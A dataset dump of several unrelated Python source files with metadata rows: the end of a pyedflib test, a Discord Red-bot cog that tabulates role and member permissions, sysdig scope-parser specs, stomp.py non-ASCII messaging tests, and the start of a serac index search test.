np.testing.assert_equal(ann_text[0], "Zaehne")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "Fuss")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "abc")
if __name__ == '__main__':
# run_module_suite(argv=sys.argv)
unittest.main()
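# For reference, the suite can also be run through standard unittest discovery
# from the repository root, for example:
#   python -m unittest pyedflib.tests.test_edfwriter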
[per-file dataset columns: statistics for the pyedflib test file above (avg_line_length 46.69, max_line_length 121, 716 lines, 33,475 bytes); next record: hexsha 71e05a16eecc4ca9b9f978163dd85ed639f94534, size 18,459, ext py, lang Python, path listpermissions/listpermissions.py, repo i-am-zaidali/Toxic-Cogs, repo head 088cb364f9920c20879751da6b7333118ba1bf41, licenses ["MIT"], stars 56 (2019-03-21 to 2022-03-14), issues 38 (2019-08-20 to 2022-02-22), forks 44 (2019-07-04 to 2022-03-25)]
from typing import Optional, Union
import discord
from fuzzywuzzy import process
from redbot.core import commands
from redbot.core.utils.chat_formatting import pagify
from prettytable import PrettyTable
class ListPermissions(commands.Cog):
"""Get the allowed/disable permissions in a guild or channel for a role or member"""
def __init__(self, bot):
self.bot = bot
async def red_delete_data_for_user(self, **kwargs):
"""This cog does not store user data"""
return
@commands.guild_only()
@commands.group(aliases=["lp"])
async def listpermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you."""
pass
@listpermissions.group(name="guild")
async def lp_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@lp_guild.command(name="role")
async def guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or the ID of it.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)  # send each page, not the whole message every iteration
@lp_guild.command(name="member")
async def guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@listpermissions.group(name="channel")
async def lp_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@lp_channel.command(name="member")
async def channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@lp_channel.command(name="role")
async def channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or its ID.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]  # mirror the fuzzy-match result shape so results[0][0] works below
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@commands.guild_only()
@commands.group(aliases=["ap"])
async def availablepermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you. Only shows the available permissions."""
pass
@availablepermissions.group(name="guild")
async def ap_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@ap_guild.command(name="role")
async def ap_guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or its ID.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]  # mirror the fuzzy-match result shape so results[0][0] works below
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@ap_guild.command(name="member")
async def ap_guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@availablepermissions.group(name="channel")
async def ap_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@ap_channel.command(name="member")
async def ap_channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Available permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@ap_channel.command(name="role")
async def ap_channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or its ID.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]  # mirror the fuzzy-match result shape so results[0][0] works below
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if not value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@commands.guild_only()
@commands.group(aliases=["dp"])
async def deniedpermissions(self, ctx):
"""Generates the permissions of a certain object and puts them in a nice table for you. Only shows the denied permissions."""
pass
@deniedpermissions.group(name="guild")
async def dp_guild(self, ctx):
"""Generates the permissions for a role or member guild wide. These will change between channels."""
pass
@dp_guild.command(name="role")
async def dp_guild_role(self, ctx, *, rolename):
"""Generates the permissions of a role.
Role name can be the name of the role (or at least close to it) or its ID.
Permissions Values:
True: means that the role has that permission
False: means that the role does not have that permission"""
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]  # mirror the fuzzy-match result shape so results[0][0] works below
t = PrettyTable(["Permission", "Value"])
for perm, value in role.permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@dp_guild.command(name="member")
async def dp_guild_member(self, ctx, member: discord.Member = None):
"""Generates the guild wide permissions for a member. This only takes into account their guild permissions, not any for specific channels."""
if not member:
member = ctx.author
permissions = member.guild_permissions
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in guild {ctx.guild.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@deniedpermissions.group(name="channel")
async def dp_channel(self, ctx):
"""Generates the permissions of a channel for either a member or a role."""
pass
@dp_channel.command(name="member")
async def dp_channel_member(
self,
ctx,
member: discord.Member = None,
channel: Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel] = None,
):
"""Generates the permissions for a member in a channel.
Permissions Values:
True: means that the person has that permission
False: means that the person does not have that permission"""
if not channel:
channel = ctx.channel
if not member:
member = ctx.author
permissions = channel.permissions_for(member)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for user: {member.display_name}] in channel {channel.name}```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
@dp_channel.command(name="role")
async def dp_channel_role(
self,
ctx,
channel: Optional[
Union[discord.VoiceChannel, discord.TextChannel, discord.CategoryChannel]
] = None,
*,
rolename,
):
"""Generates the basic permissions for a role in a channel. Note that these are only the basic permissions, True or False will only show when the permissions is different from the default permissions of a role.
Role name can be the name of the role (or at least close to it) or its ID.
Permissions Values:
None: means that it depends on the role permissions
True: means that a person can explicitly do that, despite role permissions
False: means that a person can explicitly not do that, despite role permissions
"""
if not channel:
channel = ctx.channel
try:
int(rolename)
isint = True
except ValueError:
isint = False
if not isint:
roles = [role.name for role in ctx.guild.roles]
results = process.extract(rolename, roles, limit=1)
if results[0][1] <= 70:
return await ctx.send("Match was too low to be sure the role was found.")
role = [role for role in ctx.guild.roles if role.name == results[0][0]][0]
else:
try:
role = [role for role in ctx.guild.roles if role.id == int(rolename)][0]
except IndexError:
return await ctx.send("Could not find a role with that ID.")
results = [[role.name]]  # mirror the fuzzy-match result shape so results[0][0] works below
permissions = channel.overwrites_for(role)
t = PrettyTable(["Permission", "Value"])
for perm, value in permissions:
if value:
continue
t.add_row([perm, value])
sending = f"```ini\n[Permissions for role: {results[0][0]} in channel {channel.name}]```\n```py\n{t}```"
for page in pagify(sending):
await ctx.send(page)
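The fuzzy role lookup above is duplicated verbatim across six commands. Below is a minimal sketch of a shared helper each command could call instead; it is a hypothetical refactor, not part of the original cog, and it assumes only the discord.py and fuzzywuzzy imports already at the top of this file.
async def _resolve_role(ctx, rolename):
    """Return a role matched by ID or fuzzy name, or None after replying with an error."""
    if rolename.isdigit():
        # ID path: mirrors the int(rolename) branch used inline above
        role = discord.utils.get(ctx.guild.roles, id=int(rolename))
        if role is None:
            await ctx.send("Could not find a role with that ID.")
        return role
    # Fuzzy path: same 70-point cutoff as the inline blocks above
    names = [role.name for role in ctx.guild.roles]
    match, score = process.extract(rolename, names, limit=1)[0]
    if score <= 70:
        await ctx.send("Match was too low to be sure the role was found.")
        return None
    return discord.utils.get(ctx.guild.roles, name=match)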
| 42.434483
| 220
| 0.581451
| 2,316
| 18,459
| 4.601036
| 0.069516
| 0.035473
| 0.027027
| 0.02027
| 0.943037
| 0.928585
| 0.889827
| 0.889827
| 0.889827
| 0.889827
| 0
| 0.005273
| 0.321903
| 18,459
| 434
| 221
| 42.532258
| 0.846049
| 0.004226
| 0
| 0.828746
| 0
| 0.036697
| 0.139535
| 0.039835
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003058
| false
| 0.027523
| 0.018349
| 0
| 0.06422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e07aa4ada41371debead6ee23c3f43f3bc6b8287
| 7,899
|
py
|
Python
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 45
|
2016-04-11T16:50:15.000Z
|
2020-07-11T23:37:51.000Z
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 74
|
2016-08-09T17:10:55.000Z
|
2020-07-09T08:36:16.000Z
|
specs/monitor/dashboard_converters/dashboard_scope_spec.py
|
dark-vex/sysdig-sdk-python
|
52962a0c283ca12b93a743ae8c5d1639a12b0998
|
[
"MIT"
] | 39
|
2016-04-20T17:22:23.000Z
|
2020-07-08T17:25:52.000Z
|
from expects import equal, expect, be_false, start_with
from mamba import description, it
from sdcclient.monitor.dashboard_converters import convert_scope_string_to_expression
with description("Dashboard Scopes"):
with it("parses correctly: agent.id is foo"):
param = "agent.id is foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id = foo"):
param = "agent.id = foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it('parses correctly: agent.id = "foo"'):
param = 'agent.id = "foo"'
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it('parses correctly: cluster.id-number = "foo-bar"'):
param = 'cluster.id-number = "foo-bar"'
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "cluster.id-number",
"operator": "equals",
"value": ["foo-bar"]
}]]))
with it("parses correctly: agent.id = 'foo'"):
param = "agent.id = 'foo'"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "equals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id is not foo"):
param = "agent.id is not foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notEquals",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in foo"):
param = "agent.id in foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in [foo]"):
param = "agent.id in [foo]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id in [foo, bar]"):
param = "agent.id in [foo, bar]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar"]
}]]))
with it("parses correctly: agent.id in [foo, bar, baz]"):
param = "agent.id in [foo, bar, baz]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar", "baz"]
}]]))
with it("parses correctly: agent.id in [foo, bar, baz] and agent.name is 'foobar'"):
param = "agent.id in [foo, bar, baz] and agent.name is 'foobar'"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "in",
"value": ["foo", "bar", "baz"]
}, {
"displayName": "",
"isVariable": False,
"operand": "agent.name",
"operator": "equals",
"value": ["foobar"]
}]]))
with it("parses correctly: agent.id not in foo"):
param = "agent.id not in foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notIn",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id not in [foo, bar, baz]"):
param = "agent.id not in [foo, bar, baz]"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notIn",
"value": ["foo", "bar", "baz"]
}]]))
with it("parses correctly: agent.id contains foo"):
param = "agent.id contains foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "contains",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id does not contain foo"):
param = "agent.id does not contain foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "notContains",
"value": ["foo"]
}]]))
with it("parses correctly: agent.id starts with foo"):
param = "agent.id starts with foo"
res = convert_scope_string_to_expression(param)
expect(res).to(equal([True, [{
"displayName": "",
"isVariable": False,
"operand": "agent.id",
"operator": "startsWith",
"value": ["foo"]
}]]))
with it("returns ok, but empty if scope is None"):
res = convert_scope_string_to_expression(None)
expect(res).to(equal([True, []]))
with it("returns error when parsing incorrect: agent.id starts with [foo, bar]"):
param = "agent.id starts with [foo, bar]"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id is [foo, bar]"):
param = "agent.id is [foo, bar]"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id contains [foo, bar]"):
param = "agent.id contains [foo, bar]"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id"):
param = "agent.id"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id is"):
param = "agent.id is"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
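The happy-path specs above differ only in the scope string and the expected operator/value, so they can be table-driven. A hedged sketch using pytest.mark.parametrize follows; the original file uses mamba, so this is only an illustrative equivalent, not the project's convention.
import pytest
from sdcclient.monitor.dashboard_converters import convert_scope_string_to_expression
@pytest.mark.parametrize("scope,operator,value", [
    ("agent.id is foo", "equals", ["foo"]),
    ("agent.id is not foo", "notEquals", ["foo"]),
    ("agent.id in [foo, bar]", "in", ["foo", "bar"]),
    ("agent.id not in foo", "notIn", ["foo"]),
    ("agent.id contains foo", "contains", ["foo"]),
    ("agent.id starts with foo", "startsWith", ["foo"]),
])
def test_scope_parses(scope, operator, value):
    # Same contract as the specs above: (ok, [expression, ...])
    ok, exprs = convert_scope_string_to_expression(scope)
    assert ok is True
    assert exprs == [{
        "displayName": "",
        "isVariable": False,
        "operand": "agent.id",
        "operator": operator,
        "value": value,
    }]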
| 35.581081
| 88
| 0.529687
| 854
| 7,899
| 4.776347
| 0.077283
| 0.094386
| 0.101495
| 0.112773
| 0.917137
| 0.855602
| 0.816377
| 0.799215
| 0.781564
| 0.749448
| 0
| 0
| 0.311052
| 7,899
| 221
| 89
| 35.742081
| 0.749541
| 0
| 0
| 0.70202
| 0
| 0.005051
| 0.328523
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015152
| 0
| 0.015152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e088f49a25618f7f1f2298e59117b912a8da6848
| 5,360
|
py
|
Python
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 408
|
2015-01-06T06:09:45.000Z
|
2022-03-09T08:14:59.000Z
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 231
|
2015-01-13T08:23:34.000Z
|
2022-03-29T02:29:34.000Z
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 171
|
2015-02-05T23:40:35.000Z
|
2022-01-25T14:17:18.000Z
|
# -*- coding: UTF-8 -*-
import filecmp
import os
import pytest
import stomp
from stomp.listener import *
from .testutils import *
@pytest.fixture
def conn():
conn = stomp.Connection(get_default_host(), auto_decode=False)
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
@pytest.fixture
def conn_encode():
conn = stomp.Connection(get_default_host(), auto_decode=True)
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
@pytest.fixture
def conn_encode_utf16():
conn = stomp.Connection(get_default_host(), auto_decode=True, encoding="utf-16")
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
class TestNonAsciiSend(object):
def test_send_nonascii(self, conn):
listener = conn.get_listener("testlistener")
queuename = "/queue/nonasciitest-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf8
conn.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert encode(txt) == msg
def test_image_send(self, conn):
d = os.path.dirname(os.path.realpath(__file__))
srcname = os.path.join(d, "test.gif")
with open(srcname, 'rb') as f:
img = f.read()
listener = conn.get_listener("testlistener")
queuename = "/queue/nonascii-image-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
conn.send(body=img, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert img == msg
destname = os.path.join(d, "test-out.gif")
with open(destname, 'wb') as f:
f.write(img)
assert filecmp.cmp(srcname, destname)
def test_image_send_gzip(self, conn):
d = os.path.dirname(os.path.realpath(__file__))
srcname = os.path.join(d, "test.gif.gz")
with open(srcname, 'rb') as f:
img = f.read()
listener = conn.get_listener("testlistener")
queuename = "/queue/nonascii-image-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
conn.send(body=img, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert img == msg
destname = os.path.join(d, "test-out.gif.gz")
with open(destname, 'wb') as f:
f.write(img)
assert filecmp.cmp(srcname, destname)
class TestNonAsciiSendAutoDecode(object):
def test_send_nonascii_auto_decoding(self, conn_encode):
listener = conn_encode.get_listener("testlistener")
queuename = "/queue/nonasciitest2-%s" % listener.timestamp
conn_encode.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf8
conn_encode.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert txt == msg
class TestNonAsciiSendSpecificEncoding(object):
def test_send_nonascii_specific_encoding(self, conn_encode_utf16):
listener = conn_encode_utf16.get_listener("testlistener")
queuename = "/queue/nonasciitest2-%s" % listener.timestamp
conn_encode_utf16.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf16
conn_encode_utf16.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert txt == msg
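The three fixtures above are identical except for the keyword arguments passed to stomp.Connection. A minimal context-manager factory could replace them; this is a hypothetical refactor that reuses only the helpers already star-imported from .testutils above.
import contextlib
@contextlib.contextmanager
def make_conn(**kwargs):
    # kwargs are forwarded to stomp.Connection, e.g. auto_decode=True, encoding="utf-16"
    conn = stomp.Connection(get_default_host(), **kwargs)
    conn.set_listener("testlistener", TestListener("123", print_to_log=True))
    conn.connect(get_default_user(), get_default_password(), wait=True)
    try:
        yield conn
    finally:
        conn.disconnect(receipt=None)
# Usage sketch:
# with make_conn(auto_decode=True, encoding="utf-16") as conn:
#     conn.send(body=test_text_for_utf16, destination="/queue/demo", receipt="123")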
| 35.496689
| 93
| 0.675746
| 650
| 5,360
| 5.409231
| 0.158462
| 0.055461
| 0.059727
| 0.054039
| 0.896189
| 0.889079
| 0.872582
| 0.858646
| 0.846416
| 0.819681
| 0
| 0.017237
| 0.209888
| 5,360
| 150
| 94
| 35.733333
| 0.812987
| 0.003918
| 0
| 0.714286
| 0
| 0
| 0.166948
| 0.021735
| 0
| 0
| 0
| 0
| 0.209524
| 1
| 0.07619
| false
| 0.028571
| 0.038095
| 0
| 0.142857
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e08c5286333b39452e3ae32365e85e30e0876ee8
| 3,752
|
py
|
Python
|
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Test search() in serac/index/index.py
"""
from pathlib import Path
from time import time
from serac.index.index import Pattern, search
from .test_index import IndexTestBase
class TestIndexSearch(IndexTestBase):
def test_search_file__from_head__finds_single_file(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/src/dir/three.txt"))
assert len(results) == 1
assert Path("/src/dir/three.txt") in results
assert results[Path("/src/dir/three.txt")].last_modified == int(
update_time.timestamp()
)
def test_search_file__from_past__finds_single_file(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(
timestamp=int(initial_time.timestamp()),
pattern=Pattern("/src/dir/three.txt"),
)
assert len(results) == 1
assert Path("/src/dir/three.txt") in results
assert results[Path("/src/dir/three.txt")].last_modified == int(
initial_time.timestamp()
)
def test_search_dir__from_head__finds_some_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/src/dir"))
assert len(results) == 3
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified == update_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_dir__from_past__finds_some_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(
